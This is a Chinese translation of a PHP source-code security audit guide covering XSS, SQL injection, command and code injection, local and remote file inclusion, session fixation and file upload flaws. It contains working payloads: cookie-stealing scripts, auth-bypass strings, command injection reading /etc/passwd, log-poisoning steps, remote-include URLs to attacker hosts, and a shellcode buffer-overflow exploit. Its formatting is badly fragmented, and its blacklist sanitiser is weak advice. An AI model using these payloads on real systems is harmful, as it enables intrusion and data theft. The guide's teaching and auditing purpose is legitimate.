PHP Fuzzing行動——源碼審計

目錄: 
Section 1: 
20種PHP源碼快速審計方式  
Section 2: 
PHP源碼審計自動化( PHP Fuzzer ) 
 
風險級別: ■ Low ■ Medium ■ High 
  
在開始PHP代碼分析以前,讀者必須先完成如下兩項工做: 1.安裝PHP程序; 
2.使用支持PHP代碼高亮的編輯器(好比Emeditor - Notepad++)。 
筆者在下文中所提供的方法僅做爲簡單的攻擊和防護參考。本文旨在介紹攻擊和防護方法。 注意1:其中一些話題歸Wikipedia版權全部 注意2:必須在PHP源碼中尋找如下變量:  
$_SERVER $_GET $_POST $_COOKIE $_REQUEST $_FILES $_ENV 
$_HTTP_COOKIE_VARS $_HTTP_ENV_VARS $_HTTP_GET_VARS $_HTTP_POST_FILES $_HTTP_POST_VARS $_HTTP_SERVER_VARS  
以上變量均爲PHP中的可輸入變量。 
注意3:關於這些變量的更多信息可訪問PHP官方網站:www.php.net。  
Section 1: 20種PHP源碼快速審計方式 javascript

1- Cross Site Scripting (XSS) / CRLF [Medium] 
跨站腳本(XSS)屬於WEB程序中的一類計算機安全漏洞,它容許在用戶瀏覽的網頁中注入惡意代碼,好比HTML代碼和客戶端腳本。可利用的跨站腳本漏洞可被攻擊者用於繞過訪問控制,好比同源策略(same origin policy)。這類漏洞可被用於構造釣魚攻擊和瀏覽器攻擊。  
攻擊: 
攻擊者在其請求中注入HTML代碼。 
Exp 1: <?php 
$error_message = $_GET['error']; print $error_message ; ?> 
index.php?error=<script>alert(document.cookie)</script> 
Exp 2: <html> <body> 
<input name="show_courses" value="<?php echo $_GET['show_courses']; ?>" > </body> </html> 
#http://127.0.0.1:81/1.php?show_courses="><script>alert(document.cookie);</script>  
防護: 
<?php 
$error_message = $_GET['error']; 
print htmlspecialchars($error_message ); ?> 
 
更多資料: 
http://ha.ckers.org/xss.html 
http://en.wikipedia.org/wiki/Cross-site_scripting 
http://www.googlebig.com/forum/cross-site-scripting-attack-and-defense-guide-t-178.html  
2- SQL Injection [medium] 
SQL注入是利用WEB程序數據層的安全漏洞進行代碼注入的技術。當用戶輸入的數據中並未對嵌入的SQL聲明語句進行正確過濾時,或者用戶並無被嚴格地限制輸入,從而致使惡意代碼被執行,就有可能形成SQL注入漏洞。這是一類很廣泛的安全漏洞,它可在任什麼時候候發生於被嵌入的編程或腳本語言之中。  
攻擊: 
SQL注入是PHP代碼審計過程當中發現的最爲嚴重的漏洞之一,關於這類攻擊更多的信息可php

 

 


以經過閱讀下面提供的參考資料得到,而這裏只是簡述此類漏洞而已。  
Example 1: <?php 
$id= $_GET['id']; 
$query= "SELECT * FROM users WHERE id= ' 「 .$id." ;" ... ?> 
index.php?id=1+UNION+SELECT+1,@@version,3,4,5+from+users/*  
Example 2: 
#login.php: 
<? 
//login.php -- SQL Injection Vulnerable page //Attack and defence php apps book //shahriyar - j 
$user = $_POST['user']; $pass = $_POST['pass']; 
$link = mysql_connect('localhost', 'root', 'pass') or die('Error: '.mysql_e rror()); 
mysql_select_db("sql_inj", $link); 
$query = mysql_query("SELECT * FROM sql_inj WHERE user ='".$user."' AND pas s ='" .$pass. "'",$link); 
if (mysql_num_rows($query) == 0) { 
echo"<scripttype=\"text/javascript\">window.location.href='index.html';</sc ript>"; exit; } 
$logged = 1; ?> 
 
當用戶(可能爲攻擊者)發送$_POST['user'] , $_POST['pass']給 login.php時,這
些變量直接存儲在SQL請求命令中。若是攻擊者發送: 
$user = 1' OR '1' = '1 $pass = 1' OR '1' = '1 
將會繞過login.php的登錄驗證,讀者當注意此類代碼。  
防護: 
下面是通用的防注入代碼: 
<?php 
$title = $_POST['title']; // user input from site 
$description = $_POST['description']; // user input from site // define the cleanerhtml

$dirtystuff java

= array(mysql

"\""程序員

web

"\\"正則表達式

sql

"/"shell

"*"

"'"

"="

"- 

"

"#"

";"

"<"

">"

"+"

"%"

); 

// clean user input (if it finds any of the values above, it will replace it with 

whatever is in the quotes - in this example, it replaces the value with nothing) 

$title 

str_replace

(

$dirtystuff

""

$title

); 

// works! 

$description 

str_replace

(

$dirtystuff

""

$description

); 

// works! 

// input: I\ "like/ green< ** veg'et=a-bles> and< pizza** 

// output: I like green vegetables and pizza 

// input: a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '% 

// output: aDROP TABLE users SELECT FROM data WHERE name LIKE 

?> 

<

譯註:最好仍是採用白名單的過濾方式

 

更多信息

 

http://en.wikipedia.org/wiki/Sql_injection 

http://drewish.com/files/SQL Injection Overview.ppt 

http://www.php.net/manual/en/security.database.sql-injection.php 

 

攻擊實例:

 

http://www.milw0rm.com/papers/241 

http://www.milw0rm.com/papers/202

$dirtystuff = array("\"", "\\", "/", "*", "'", "=", "- ", "#", ";", "<", ">", "+", "%"); 
// clean user input (if it finds any of the values above, it will replace it with whatever is in the quotes - in this example, it replaces the value with nothing) $title = str_replace($dirtystuff, "", $title); // works! 
$description = str_replace($dirtystuff, "", $description); // works! // input: I\ "like/ green< ** veg'et=a-bles> and< pizza** // output: I like green vegetables and pizza 
// input: a';DROP TABLE users; SELECT * FROM data WHERE name LIKE '% // output: aDROP TABLE users SELECT FROM data WHERE name LIKE ?> 
<譯註:最好仍是採用白名單的過濾方式>  
更多信息 : 
http://en.wikipedia.org/wiki/Sql_injection 
http://drewish.com/files/SQL Injection Overview.ppt 
http://www.php.net/manual/en/security.database.sql-injection.php  
攻擊實例: 
http://www.milw0rm.com/papers/241 http://www.milw0rm.com/papers/202 
 
2- HTTP Response Splitting [Medium
HTTP響應分裂是一種WEB程序漏洞,它能夠致使應用程序或者環境設置對輸入值的過濾失效,也能夠執行跨站腳本攻擊,跨用戶攻擊,WEB緩存中毒以及其它相似的攻擊。  
重要的HTTP頭列表: 

 

在PHP語言中,咱們可使用」header」函數來設置HTTP頭,在一些PHP源碼中,你能夠發現"header", "$_SERVER"等函數。在"$_SERVER"函數中的一些參數包含有用戶輸入的
數據: 
REQUEST_URI, PATH_INFO, QUERY_STRING 

 

Example 1: 

<?php 

redirect_page 

$_GET

[

'page'

]; 

header 

(

"Location: " 

redirect_page

); 

?> 

redirect.php?page=http://www.abysssec.com 

For $_SERVER: 

<?php 

echo 

"Welcome From " 

$_SERVER

[

'HTTP_REFERER'

]; 

?> 

 

可使用

Mozilla Firefox

插件

"Tamper Data"

來發送一般的

HTTP header

 

https://addons.mozilla.org/en-US/firefox/addon/966

 

Example 2 : 

<?php 

$Name 

"test"

//senders name 

$email 

"email@adress.com"

//senders e-mail adress 

$recipient 

$_GET

[

'to'

];

//recipient 

$mail_body 

"The text for the mail..."

//mail body 

 

$subject 

"Subject …"

//subject 

$header 

"From: "

$Name 

" <" 

$email 

">\r\n"

mail

(

$recipient

$subject

$mail_body

$header

); 

//mail command :) 

?> 

 

CRLF

HTTP Response Splitting

的另外一種方式。在上面的例子中,行

4

中的

$recipient

變量並無對全部的輸入數據進行檢測,以至攻擊者能夠添加「

CC

」:

 

默認輸入爲:

 

$headers = "From: myplace@here.com\r\n"; 

$headers .= "CC: sombodyelse@noplace.com\r\n"; 

「CC」 

 

」From」 

 

\r\

n」 

分隔。

 

 

污染輸入:

 

Mail.php?to=info@test.com\r\nCC: sombodyelse@noplace.com

 

 

防護:

 

1- 

檢測

Mail Header

的輸入值

 

2- 

可以使用如下方式輸入,而不用

URL

輸入:

 

<?php 

$id 

$_GET

[

'url_id'

]; 

if (

$id 

== 

1

) { 

header 

(

"Location: " 

redirect_page

); 

?> 

 

 

<?php 

echo 

"Welcome From " 

htmlspecialchars

(

$_SERVER

[

'HTTP_REFERER'

]); 

?> 

攻擊實例

(video) : 

http://www.milw0rm.com/video/watch.php?id=28 

http://www.securiteam.com/unixfocus/6F00Q0K6AK.html 

http://o0o.nu/~meder/o0o_Blogger_HTTP_response_splitting.txt 

http://www.securityfocus.com/archive/1/369405

 

4- 動態賦值漏洞 [High]: 
1-當使用動態函數加載時,可經過請求來執行指定的函數,致使攻擊者能夠執行任意函數。 攻擊: 
<?php 
$myfunc = $_GET['myfunc']; $myfunc(); ?> 

 

 


Index.php?myfunc=phpinfo 
2-全局函數漏洞 
Register Global是危險的「PHP擴展」: 當其打開時,register_globals可利用各類變量注入腳本代碼,好比來自HTML表單的請求。這種漏洞主要與PHP變量未初始化相關,以至垂手可得地便可向其寫入惡意代碼。這是一個艱難地抉擇,但PHP官方最後依然決定在默認狀況下禁止該指令。當容許該指令時,用戶仍可以使用變量,但沒法肯定它是來自哪裏,而只能靠猜想。在腳本中定義的內部變量很容易與用戶發送的請求數據相混淆,而只能經過禁止register_globals來解決這種狀況。下面演示一個未使用register_globals的例子: 
Admin.php <?php 
if (isset($is_admin)) { 
//Yes, I'm the admin so call the Administration Pannel [...] } else { 
//No, I'm not the admin [...] } ?> 
# admin.php?is_admin=1 
另外一個說明register_globals存在問題的例子就是下面關於動態路徑的包含: 
<?php 
include "$path/script.php"; ?> 
當容許register_globals時,可用如下方式請求頁面: Index.php?path=http://evil.example.org/? 至關於下面的請求: 
<?php 
include 'http://evil.example.org/?/script.php'; ?> 
 
注意(php.ini配置): 
若是allow_url_fopen 是enabled(默認狀況下是enabled,甚至在php.ini中民被推薦的設置),這將包含http://evil.example.org/的輸出,正如本地文件通常。這是一個嚴重的安全
漏洞,這也是在一些開源的代碼程序中被發現的。 防護: 
不要使用這種方式去加載函數,這是一個危險地帶!任什麼時候候,任何狀況下,Register Global都應該關閉!或者將變量的內容設置以下: 
<?php 
$is_admin =(); 
if (isset($is_admin)) { 
//Yes, I'm the admin so call the Administration Pannel [...] } else { 

 

 


//No, I'm not the admin [...] } ?> 
 
攻擊實例 / 信息: 
http://www.milw0rm.com/exploits/7705 
http://wiki.lunarpages.com/PHP_and_Register_Global_Variables

5- 進程控制/PHP代碼注入 (HIGH): 
當咱們使用下列函數:「PHP進程執行函數&進程控制」,而且用戶能夠輸入變量(見上面),那麼將致使任意的PHP代碼被執行。 PHP進程控制列表: 
Exec system passthru shell_exec proc_open pcntl_exec  
Example 1: 
<?php 
$page = $_GET['page']; system ("type " . $page); ?> 
# index.php?page=/etc/passwd | uname –a  
Example 2: 
下列代碼是來自一項管理系統的WEB程序,它容許用戶封裝批處理文件進行Oracle數據庫備份,而後運行cleanup.bat腳本去清除一些臨時文件。rmanDB.bat可接受單命令行參數,
由它指定備份類型。由於數據庫訪問是受限的,備份程序須要權限用戶纔可執行。 
<? ... 
$btype = $_GET['backuptype']; 
$cmd = "cmd.exe /K \"c:\\util\\rmanDB.bat " . $btype . "&&c:\\utl\\cleanup. bat\""; system(cmd); ... ?> 
這個問題主要是讀取用戶數據的backuptype參數時未對其進行任何有效地過濾所致使的。特別是Runtime.exec()函數將不能執行多條命令,但在這種狀況下,程序爲了單次調用Runtime.exec()以執行多條命令,它就得先去執行cmd.exe shell。Shell一經調用,它將會分別執行被點號分隔的多條命令。若是攻擊者發送一條經惡意構造的命令"&& del 

 

 


c:\\dbms\\*.*",那麼程序將隨之執行該條命令。因爲程序須要必定的權限才能與數據庫交互,所以被注入的任何命令都將以此權限運行。 
當程序員使用eval()函數操做內部數據時,這些數據均可能會被攻擊者關注到,由於它很容易致使代碼執行漏洞的發生: 
<?php 
$install = $_REQUEST['install_command']; eval($install); ?> 
上面的代碼如玫瑰香通常誘人,由於它可能被用來執行代碼注入。 install.php?install_command=phpinfo(); 實例代碼: 
<?php [...] 
$register_poll_vars = array("id","template_set","action"); for ($i=0;$i<sizeof($register_poll_vars);$i++) { if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) { eval("\$$register_poll_vars[$i] = 
\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";"); } elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) { eval("\$$register_poll_vars[$i] = 
\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";"); } else { 
eval("\$$register_poll_vars[$i] = '';"); }} [...] ?> 
$$register_poll_vars[$i] 是用戶輸入的變量。 
 
http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]// 
 
攻擊實例: 
http://www.milw0rm.com/exploits/3758 http://www.milw0rm.com/exploits/309

 

 

6- 本地/遠程文件包含(High): 
本地或者遠程文件包含是PHP代碼審計中的高危漏洞,攻擊者可利用它加載本地或者遠程文件到PHP WEB頁面。 危險函數: 
include 
include_once require 
require_once show_source

highlight_file 

readfile 

file_get_contents 

fopen 

file

 

 

一般,

PHP

中的每個「文件系統函數」均可能是危險的,可參見這裏:

 

http://ir.php.net/manual/en/ref.filesystem.php

 

本地文件包含:

 

<?php 

include(

'../geshi.php'

); 

if ( isset(

$_POST

[

'submit'

]) ) //* 

//* 

if ( 

get_magic_quotes_gpc

() ) 

$_POST

[

'source'

] = 

stripslashes

(

$_POST

[

'source'

]); 

if ( !

strlen

(

trim

(

$_POST

[

'source'

])) ) 

//BUG is HERE 

$_POST

[

'source'

] = 

implode

(

''

, @

file

(

'../geshi/' 

$_POST

[

'language'

] . 

'.php'

)); 

$_POST

[

'language'

] = 

'php'

?>

 

在星號

*

標記的一行中,若是存在變量

$_POST 

['submit']

 

$_POST 

['language'],

那麼你就

能夠讀取任何的

PHP

文件。所以,咱們能夠利用此漏洞讀取

config.php

文件!

 

Exploit: 

<form action="http://[HOST]/example.php" method="post"> 

Path to file: 

example: ../../../../config 

<textarea name="language"></textarea> 

<input type="submit" name="submit" value="See"> 

</form>

 

注意:

 

在本地文件包含(

LFI

)攻擊中,攻擊者可讀取對方主機中的任何日誌文件和本地文件。也

許這種文件瀏覽並不能形成多大危害,

但攻擊者可先構造一個錯誤,

而後該錯誤會被記錄在

服務器上的日誌文件中

(apache log / error log

等等

)

。當攻擊者向目標主機請求一個未

存在的文件時:

 

Test000.php?code=<?php;phpinfo();?>

 

這將會把全路徑地址都記錄在

error.log

文件中

(在本例中,

你的日誌文件路徑可能與筆者不

同)

與此同時,

當咱們利用

LFI

漏洞的變量去加載

error.log

時,

攻擊者便可執行本身的

PHP

代碼。

 

默認日誌文件路徑列表:

 

var/log/httpd/access_log 

 

var/log/httpd/error_log 

apache/logs/error.log 

apache/logs/access.log 

apache/logs/error.log 

apache/logs/access.log 

apache/logs/error.log 

apache/logs/access.log 

apache/logs/error.log 

apache/logs/access.log 

apache/logs/error.log 

apache/logs/access.log 

logs/error.log 

logs/access.log 

logs/error.log 

logs/access.log 

logs/error.log 

logs/access.log 

logs/error.log 

logs/access.log 

logs/error.log 

logs/access.log 

etc/httpd/logs/access_log

 

etc/httpd/logs/access.log 

etc/httpd/logs/error_log 

etc/httpd/logs/error.log 

var/www/logs/access_log 

var/www/logs/access.log 

usr/local/apache/logs/access_log 

usr/local/apache/logs/access.log 

var/log/apache/access_log 

var/log/apache/access.log 

var/log/access_log 

var/www/logs/error_log 

var/www/logs/error.log 

usr/local/apache/logs/error_log 

usr/local/apache/logs/error.log 

var/log/apache/error_log 

var/log/apache/error.log 

var/log/access_log 

var/log/error_log 

Example: 

http://www.milw0rm.com/exploits/2270

 

(譯註:關於更多的

LFI2RCE

技術能夠參見我在博客

http://riusksk.blogbus.com

上寫的一篇

文章《利用

PHP

代碼實現

LFI2RCE

,

網上對本文的轉載是不完整的,由於後來我又補寫了

 

一段上去。

 

 

遠程文件包含:

 

遠程文件包含攻擊容許惡意用戶在存在漏洞的主機上運行本身的

PHP

代碼,攻擊者可包含

存放在網上空間中用

PHP

編寫的網頁(惡意)代碼。例以下面的一段漏洞代碼:

 

<?php 

if (

eregi

(

"theme.php"

$_SERVER

[

'PHP_SELF'

])) 

die(); 

global 

$theme

$_FNROOTPATH

,

$lang

//<-- REQUEST Variable 

global 

$forumback

$forumborder

$_FN

[

'table_background'

]=&

$forumback

$_FN

[

'table_border'

]=&

$forumborder

if (

$forumback

==

"" 

&& 

$forumborder

==

""

){ 

$forumback

=

"ffffff"

$forumborder

=

"000000"

// Load File 

require_once (

$_FNROOTPATH 

"themes/$theme/theme.php"

); 

... 

?>

 

Exploit:

 

因爲變量

$_FNROOTPATH

未明確地指定數值,所以攻擊者能夠注入本地的惡意文件到

URL

中,

並在目標服務器上執行:

 

http://localhost/~flatnux/index.php?_FNROOTPATH=http://attacker.com/shell.php%00

 

攻擊實例:

 

http://www.milw0rm.com/exploits/8066 

http://www.milw0rm.com/exploits/8025 

http://www.milw0rm.com/exploits/7939 

http://www.milw0rm.com/exploits/7969 

http://www.milw0rm.com/exploits/6817

 7 –文件管理 (HIGH):

有些PHP函數可用於文件管理,若是偷懶的程序員沒有對輸入變量進行很好地檢測,那麼就可能形成這種高危漏洞。 
Copy函數: <?php 
$file = $_GET['cpFile']; 
$newfile = "/user/local/www/html/tmp/file.php"; if (!copy($file, $newfile)) { echo "failed to copy $file...\n"; } else { 
echo " thanks .." } ?> 

 

 


攻擊者能夠複製其它文件,好比'/etc/passwd' into '$newfile',而後讀取它。 http://victim.com/index.php?cpfile=/etc/passwd 其它危險函數以下: 文件刪除 [見PHP.Net]: 
Rmdir unlink delete fwrite 
壓縮 & 解壓縮函數: 
<?php 
$file = "/tmp/foo.bz2"; 
$bz = bzopen($file, "r") or die("Couldn't open $file for reading"); bzclose($bz); ?>

8- 緩衝區溢出 (High, 但難利用):

當程序員使用下面的危險函數時: confirm_phpdoc_compiled mssql_pconnect mssql_connect crack_opendict snmpget 
ibase_connect 
緩衝區溢出漏洞就可能發生在上面的函數中。  
緩衝區溢出舉例(snmpget()): 
<?php 
$host = $_GET['host']; $timeout = $_GET['timeout']; 
$syscontact = snmpget("$host", "public", "$timeout"); ?>  
Exploit: 
<?php 
// PHP 4.4.6 snmpget() object id local buffer overflow poc exploit // rgod [-> R.I.P] + Edited By Abysssec INC // site: http://retrogod.altervista.org // win xp sp2 version 
if (!extension_loaded("snmp")){ 
die("you need the snmp extension loaded."); } 
$____scode= "\xeb\x1b". 

 

 


"\x5b". "\x31\xc0". "\x50". "\x31\xc0". "\x88\x43\x59". "\x53". 
"\xbb\x6d\x13\x86\x7c". //WinExec "\xff\xd3". "\x31\xc0". "\x50". 
"\xbb\xda\xcd\x81\x7c". //ExitProcess "\xff\xd3". 
"\xe8\xe0\xff\xff\xff". "\x63\x6d\x64". "\x2e". "\x65". "\x78\x65". "\x20\x2f". "\x63\x20". 
"start notepad & "; 
$edx="\x64\x8f\x9b\x01"; //jmp scode 
$eip="\x73\xdc\x82\x7c"; //0x7C82DC73 jmp edx 
$____suntzu=str_repeat("A",188).$edx.str_repeat("A",64).$eip.str_repeat("\x 
90",48).$____scode.str_repeat("\x90",48); 
//more than 256 chars result in simple eip overwrite $curl = curl_init(); //Send Time out 
curl_setopt ($curl, CURLOPT_URL, "http://target.com/snmp.php?host=127.0. 0.1&timeout=$____suntzu"); curl_exec ($curl); curl_close ($curl); ?>

9- Cookie / Session injection / Fixation / [High]: 

 



所以這裏並非執行攻擊的最薄弱點。 
捕獲有效的會話ID是最爲廣泛的會話攻擊類型,固然,這還有不少其它方法。因爲會話ID是在cookies或者GET變量中傳輸的,所以各類攻擊方式都主要聚焦於這些傳輸方式。當瀏覽器存在一些關於cookies的漏洞時(大部分是發生在Internet Explorer中),cookies
比GET變量曝露會話ID的機率更低,所以對於大多數使用cookies的用戶,你能夠爲他們提供一種更爲安全的傳輸機制——利用cookie傳輸會話ID。 
 
注視法是獲取有效會話ID最爲簡單的方式。這種方法很難被防護,但若是你的會話機制僅僅使用session_start(),那麼就可能存在漏洞。爲了演示這種會話注視法,請看
下面的代碼,session.php: 
 <?php 
session_start(); 
if (!isset($_SESSION['visits'])) { 
$_SESSION['visits'] = 1; } else { 
$_SESSION['visits']++; } 
echo $_SESSION['visits']; ?> 
 
當首次訪問該頁面時,你能夠看到1被輸出到屏幕上。在隨後的每次訪問中,該數值將會隨之增長,以反映頁面訪問次數。 
爲了演示session fixation,首先須要確保你的電腦上並不存在會話ID(能夠刪除cookies),而後將?PHPSESSID=1234添加到URL中以訪問該頁面。接着,以徹底不一樣
的瀏覽器(甚至是徹底不一樣的計算機)訪問添加了?PHPSESSID=1234的URL地址。此時你將會看到屏幕上並無輸出1,而是繼續你以前開始的會話。 
爲什麼存在這種問題呢?大部分的session fixation攻擊只是簡單地使用一個連接或者一個協議,以將用戶重定向到一個包含會話ID的URL地址的遠程站點。用戶可能並不會注意到,由於這個站點將顯示徹底相同的內容。因爲會話ID已被獲知了,那麼就能夠利用它來發動僞造攻擊,好比會話劫持(session hijacking)。 
 一次像這樣簡單的攻擊是很容易被阻止的。若是正在活動的會話與用戶擁有的會話ID無關,那麼它能夠從新生成會話ID: 
<?php 
session_start(); 
if (!isset($_SESSION['initiated'])) { 
session_regenerate_id(); $_SESSION['initiated'] = true; } ?> 
 

 

 


對於這樣簡單的防護,攻擊者只需用一個特定的會話ID初始化session便可,而後使用該ID發動攻擊。爲了阻止這類攻擊,首先應當知道會話劫特只在用戶登錄後有效,或者要否則就是得到高權限後纔有用。所以,若是當權限級別改變時(例如覈實用戶名和密碼後),咱們就應該修改即將從新生成的會話ID,這樣咱們才能真正地消除被session fixation攻擊的風險。  
會話劫持(Session Hijacking) 
 
在全部被用來訪問他人會話的攻擊技術中,會話劫持無疑是最廣泛的一種會話攻擊技術。正如session fixation同樣,若是你的會話機制僅由session_start()組成,那麼它就存在
漏洞,即便利用起來並不簡單。與其關注如何阻止會話ID被竊取,倒不如想一想如何成功地完成一次會話ID竊取。因爲會話僞造的每一步複雜化都會提升咱們的安全性,所以爲了將會話劫持複雜化,咱們須要檢查成功完成會話劫持所須要的每一步驟。在每一種方案中,咱們都將假設會話ID已被竊取。在最爲簡單的會話機制中,一個有效的會話ID是會話劫持成功與否的關鍵所在。爲了完善它,咱們須要查看用於其它認證的HTTP請求中是否還有其它東西。  
注意 
單純地依靠TCP/IP層上的東西(好比IP地址)是不明智的,由於一些更爲底層的協議沒法兼容發生在HTTP層上的行爲。一個用戶可能用不一樣的IP地址去完成每一次的請求,多個用戶也可能擁有共同的IP地址。  
一個典型的HTTP requtest: 
GET / HTTP/1.1 Host: example.org 
User-Agent: Mozilla/5.0 Gecko 
Accept: text/xml, image/png, image/jpeg, image/gif, */* Cookie: PHPSESSID=1234 
 
因爲Host header是HTTP/1.1所必需的,所以依靠其它信息是不明智的。可是,防護的堅固程度確實是咱們所須要的,由於咱們關注的是如何增長會話僞造的難度,以防止危害到合法用戶。假設以前的request是由下面與之不一樣的User-Agent請求的:  
GET / HTTP/1.1 Host: example.org 
User-Agent: Mozilla Compatible (MSIE) 
Accept: text/xml, image/png, image/jpeg, image/gif, */* Cookie: PHPSESSID=1234 
 
雖然相同的cookie是存在的,可是是否能夠假設它們是同一用戶呢?這彷佛與瀏覽器更改請求包中的User-Agent header很不一樣吧?下面咱們修改會話機制以進行對比: 
 
<?php 
session_start(); 

 

 


if (isset($_SESSION['HTTP_USER_AGENT'])) { 
if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) { 
/* Prompt for password */ exit; } } else { 
$_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']); } ?> 
 
如今攻擊者不只須要提供一個有效的會話ID,並且還必須提供與會話中相匹配的
User-Agent header。雖然這使事情輕微的複雜化,但這可使它變得更爲安全了。 
咱們是否還能夠再提升它的安全性呢?人們認爲獲取cookie值的通用方式就是利用瀏覽器(好比IE)漏洞。這些攻擊方式包括受害者訪問攻擊者的惡意站點,所以攻擊者也能夠獲取正確的User-Agent header。這就要求咱們必須採起其它的保護方式以對抗這種狀況。
若是咱們要求用戶在每一項請求中都必須傳輸User-Agent的MD5值,那麼攻擊者將沒法篡改受害者的請求包中所包含的頭信息了,但這也將須要再發送一項附加信息了。當這一特定的token容易被猜想到時,咱們能夠將這一猜測工做複雜化,以提升猜測的難度,這隻需簡單地添加一個隨機生成的額外數據便可構造出token:  
<?php 
$string = $_SERVER['HTTP_USER_AGENT']; $string .= 'SHIFLETT'; 
/* Add any other data that is consistent */ $fingerprint = md5($string); ?> 
 
記住,咱們是在cookie中傳輸會話ID的,這就致使了攻擊者經常得去破壞cookie(可能全部的HTTP頭也是如此)才能竊取到會話ID,所以咱們應該以URL變量來傳輸fingerprint。
這些都必須在全部的URL中傳輸,即便是會話ID也是如此,由於這些都是必需的,這樣會話才能自動地保持下去(還得經過全部檢測)。 
爲了確保合法用戶不會像犯人同樣被對待,這就須要在檢測失敗時要求輸入密碼。若是在你的檢測方法中存在錯誤,好比錯誤地判斷一個發動僞造攻擊的用戶,那麼在繼續操做前就得要求輸入密碼,以確保在這種狀況下受到最小的攻擊。事實上,用戶可能在察覺到這種請求方式後,會感激你添加了這種保護方式。 
其實還有其它各類不一樣的方法能夠用來提升僞造會話的複雜程度,以防止發生會話劫持。同時但願在對session_start()的額外處理上,你能夠有本身的想法。總之只需記住:爲難壞小子,方便好小子。  
攻擊實例: 

 

 


http://www.milw0rm.com/exploits/3508 http://www.milw0rm.com/exploits/858 http://www.milw0rm.com/exploits/871

10 – 拒絕服務[Medium, But Hard Assessment]:

WEB程序特別容易受到拒絕服務攻擊。一個WEB程序很難講清惡意數據傳輸與普通數據傳輸之間的不一樣,這裏面有多方面的因素,可是其中最爲重要的一點就是:因爲多種緣由,IP地址不能做爲可行的鑑定證書。因爲沒有一種可靠的方式能夠得知HTTP request來自哪
裏,這就致使很難過濾掉一些惡意的數據傳輸。對於分佈式攻擊,程序又該如何去辨別真實攻擊與多用戶同時重載數據(網站的這種臨時問題是可能發生的)或者獲取「slash dotted」之間的不一樣呢? 
例如:  
<?php //.... 
$user_mode=$_SERVER['HTTP_USER_AGENT']; $user_ip=$_SERVER['SERVER_ADDR']; 
$sql = "INSERT INTO tbl_name (..) VALUES($user_mode,$user_ip);"; //Summon Myssql For each Request and Write into it. //.. ?> 
 
當一些訪問者請求查看目標站點時,他們的信息(例如IP及瀏覽器信息)將會被記錄在MYSQL數據庫中。與此同時,當一些用戶(或者一些攻擊者發動請求)發送請求後,Mysql 服務器將對其進行處理。 
其它循環函數,好比:[While, for ...] 
一旦攻擊者可摧毀一些必需的資源,那麼他們就能夠阻止合法用戶使用系統。一些被限制的資源包括帶寬,數據庫鏈接,磁盤存儲,CPU,內存,線程,或者程序特定資源。 
 
攻擊實例: 
http://archive.cert.uni-stuttgart.de/bugtraq/2006/01/msg00397.html 
http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2006-03/msg00092.html 
 
在上例中:  
profile.php:註冊用戶,註冊中咱們可使安全代碼圖片失效 search.php:經過數據庫不能記錄到的方式進行搜索。

11 - XPath注入 [XML函數]: 

SQL注入是最爲廣泛的代碼注入攻擊方式,但咱們這裏要講述的是其它一些可危害到你的程序及數據的其它注入攻擊方式,主要包括LDAP注入和XPath注入。'XPath injection'與

 

 


SQL注入攻擊類似,但它的攻擊目標是XML document,而非SQL數據庫。'XPath Injection'是用於攻擊WEB站點的攻擊技術,用於構造來自用戶提供的XPath請求。 
例如:  
<?php 
$test = $_GET['test']; if ($test){ 
$xml = simplexml_load_file("1.xml"); $result = $xml->xpath($test); print_r($result); } ?> 1.xml : 
<?xml version="1.0" encoding="UTF-8"?> <note> 
<to>Tove</to> <from>Jani</from> 
<heading>Reminder</heading> 
<body>Don't forget me this weekend!</body> </note> 
 
Good Query : 
Index.php?test=from  
Good Result : 
Array ( [0] => SimpleXMLElement Object ( [0] => Jani ) )  
Bad Query : Index.php?test=*  
Good Result For US ! : 
Array ( [0] => SimpleXMLElement Object ( [0] => Tove ) [1] => SimpleXMLElement Object ( [0] => Jani 
) [2] => SimpleXMLElement Object ( [0] => Reminder ) [3] => SimpleXMLElement Object ( [0] =>Don't forget me this weekend! ) )  
這是一個存在漏洞的PHP程序! 注意: 
Xpath Injection有多種方式,好比SQL/Xpath Inject , Basic Xpath Inject & …  
更多信息: 
http://www.modsecurity.org/archive/amit/blind-xpath-injection.pdf http://www.ibm.com/developerworks/xml/library/x-xpathinjection.html http://joginipally.blogspot.com/2007/10/code-injection-xpath-injection.html 

 

 


http://www.webappsec.org/projects/threat/classes/xpath_injection.shtml 
 
攻擊實例: 
http://www.securityfocus.com/archive/1/466211

12 – 常被濫用: 文件上傳 (High): 

當容許文件上傳到你的系統時,你就得承擔必定的風險,由於文件可能並不是它所顯示出來的那樣(假裝爲圖片以上傳PHP腳本,並將其移動到他們能夠運行它的地方等等)。若是你的站點不須要上傳文件,那麼禁止它將能夠防止因疏忽形成的錯誤而被上傳惡意文件。 
Example 1:下列代碼用於處理上傳的文件,它將文件移動到WEB根目錄下。攻擊者能夠上傳惡意PHP源文件給該程序以及來自服務端的後續請求,這將致使它們被PHP解釋器執行(查找$_FILES函數)。  
<?php 
$udir = './'; // Relative path under Web root 
$ufile = $udir . basename($_FILES['userfile']['name']); 
if (move_uploaded_file($_FILES['userfile']['tmp_name'], $ufile)) { echo "Valid upload received\n"; } else { 
echo "Invalid upload rejected\n"; } ?> 
 
即便程序將文件存儲在一個不可經過WEB訪問的目錄下,攻擊者依然能夠將惡意內容注入到服務端環境中以發動其它攻擊。若是程序易遭受到路徑操做,命令注入或者遠程文件包含漏洞等的影響,那麼攻擊者可能會上傳一個包含惡意內容的文件,以使程序經過可利用的漏洞去讀取或執行它。  
攻擊 (發送文件):  
<html> 
<body> <form enctype="multipart/form-data" method=POST> 
<input type=file name="userfile"> <input type="submit"> </form> 
</body> </html> 
 
防護: 
若是用戶並不須要上傳文件,那麼就關閉它。 PHP.ini: 
file_uploads = off  

 

 


攻擊實例: 
http://www.milw0rm.com/exploits/2937 
http://securityvulns.com/Tdocument590.html 

13 – 函數/文件的未認證調用(Medium):

